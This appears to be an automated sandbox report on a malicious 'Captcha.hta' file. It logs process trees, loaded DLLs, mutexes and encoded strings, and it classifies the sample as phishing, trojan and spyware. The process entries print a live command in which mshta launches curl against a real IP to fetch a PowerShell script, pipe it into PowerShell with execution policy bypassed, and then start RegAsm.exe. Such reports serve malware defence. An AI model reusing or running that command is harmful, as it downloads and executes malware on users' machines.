Source: 4.2.powershell.exe.4d8ab64.2.raw.unpack, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: 4.2.powershell.exe.4d8ab64.2.raw.unpack, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: 4.2.powershell.exe.4a3acb0.0.raw.unpack, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: 4.2.powershell.exe.4a3acb0.0.raw.unpack, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@14/10@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

7_2_004361E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1660:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmp4lrp5.lef.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Captcha.hta

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Captcha.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
